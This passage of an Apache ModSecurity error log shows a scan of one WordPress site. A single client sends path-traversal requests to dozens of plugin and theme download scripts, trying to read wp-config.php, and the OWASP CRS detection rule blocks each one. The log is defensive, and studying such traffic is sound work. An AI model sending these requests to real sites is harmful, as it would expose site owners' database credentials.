Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZN-waUWc94tsnIsHAQ-XmwAAANM"] [Fri Aug 18 12:54:49.923919 2023] [:error] [pid 18873:tid 140103457580800] [client 87.249.132.213:35322] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-zip-attachments/download.php?File=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-zip-attachments/download.php"] [unique_id "ZN-wabCcrCl0jrDdhfxXQwAAAEU"] [Fri Aug 18 12:54:51.652187 2023] [:error] [pid 18874:tid 140103368304384] [client 87.249.132.213:35328] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=file..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "ZN-wa1xvK4MFoveIP9_KqQAAAIc"] [Fri Aug 18 12:54:51.746388 2023] [:error] [pid 18874:tid 140103326340864] [client 87.249.132.213:35330] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php"] [unique_id "ZN-wa1xvK4MFoveIP9_KqgAAAIw"] [Fri Aug 18 12:54:51.841329 2023] [:error] [pid 18874:tid 140103499544320] [client 87.249.132.213:35332] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source.php"] [unique_id "ZN-wa1xvK4MFoveIP9_KqwAAAIA"] [Fri Aug 18 12:54:51.936653 2023] [:error] [pid 18872:tid 140103242413824] [client 87.249.132.213:35334] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/flash-album-gallery/facebook.php?i=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZN-wa_G_rKmCSnA6LxD5hwAAABY"] [Fri Aug 18 12:54:52.053635 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:35336] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/section-widget/themes/theme-loader.php?theme=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/section-widget/themes/theme-loader.php"] [unique_id "ZN-wbLCcrCl0jrDdhfxXRAAAAEQ"] [Fri Aug 18 12:54:52.148000 2023] [:error] [pid 18872:tid 140103359911680] [client 87.249.132.213:35338] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/yourls-widget/yourls-widget-hook.php"] [unique_id "ZN-wbPG_rKmCSnA6LxD5iAAAAAg"] [Fri Aug 18 12:54:52.242513 2023] [:error] [pid 18873:tid 140103309555456] [client 87.249.132.213:35340] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "ZN-wbLCcrCl0jrDdhfxXRQAAAE4"] [Fri Aug 18 12:54:52.336707 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:35342] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/files.php?file=..%2F..%2F..%2F..%2Fwp-config.php&nonce=0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/files.php"] [unique_id "ZN-wbEWc94tsnIsHAQ-XngAAAMM"] [Fri Aug 18 12:54:54.896163 2023] [:error] [pid 19445:tid 140103499544320] [client 87.249.132.213:35354] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/count-per-day/download.php?n=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/count-per-day/download.php"] [unique_id "ZN-wbkWc94tsnIsHAQ-XnwAAAMA"] [Fri Aug 18 12:54:54.994896 2023] [:error] [pid 18874:tid 140103474366208] [client 87.249.132.213:35356] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php"] [unique_id "ZN-wblxvK4MFoveIP9_KrwAAAIM"] [Fri Aug 18 12:54:55.095315 2023] [:error] [pid 18872:tid 140103234021120] [client 87.249.132.213:35358] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/backbone/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/backbone/download.php"] [unique_id "ZN-wb_G_rKmCSnA6LxD5iQAAABc"] [Fri Aug 18 12:54:55.190125 2023] [:error] [pid 18872:tid 140103292770048] [client 87.249.132.213:35360] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cakifo/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cakifo/download.php"] [unique_id "ZN-wb_G_rKmCSnA6LxD5igAAABA"] [Fri Aug 18 12:54:55.305838 2023] [:error] [pid 18874:tid 140103465973504] [client 87.249.132.213:35362] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/derby-book-festival/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/derby-book-festival/download.php"] [unique_id "ZN-wb1xvK4MFoveIP9_KsAAAAIQ"] [Fri Aug 18 12:54:55.400078 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:35364] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/EEEZ/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/EEEZ/download.php"] [unique_id "ZN-wb0Wc94tsnIsHAQ-XoAAAANA"] [Fri Aug 18 12:54:55.506459 2023] [:error] [pid 19445:tid 140103275984640] [client 87.249.132.213:35366] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/greenearth-v1-06/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/greenearth-v1-06/download.php"] [unique_id "ZN-wb0Wc94tsnIsHAQ-XoQAAANI"] [Fri Aug 18 12:54:55.603767 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:35368] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IqraAcademy/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IqraAcademy/download/download.php"] [unique_id "ZN-wb0Wc94tsnIsHAQ-XogAAAMU"] [Fri Aug 18 12:54:55.697870 2023] [:error] [pid 18874:tid 140103259199232] [client 87.249.132.213:35370] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lmm5th/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lmm5th/download.php"] [unique_id "ZN-wb1xvK4MFoveIP9_KsQAAAJQ"] [Fri Aug 18 12:54:55.801205 2023] [:error] [pid 18872:tid 140103317948160] [client 87.249.132.213:35372] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/loom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/loom/download.php"] [unique_id "ZN-wb_G_rKmCSnA6LxD5iwAAAA0"] [Fri Aug 18 12:54:55.896847 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:35374] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mercato/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mercato/framework/utilities/download/getfile.php"] [unique_id "ZN-wb0Wc94tsnIsHAQ-XowAAAMg"] [Fri Aug 18 12:54:55.991315 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35376] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "ZN-wb0Wc94tsnIsHAQ-XpAAAAMo"] [Fri Aug 18 12:54:56.086631 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:35378] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ParentingOurParents/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ParentingOurParents/download/download.php"] [unique_id 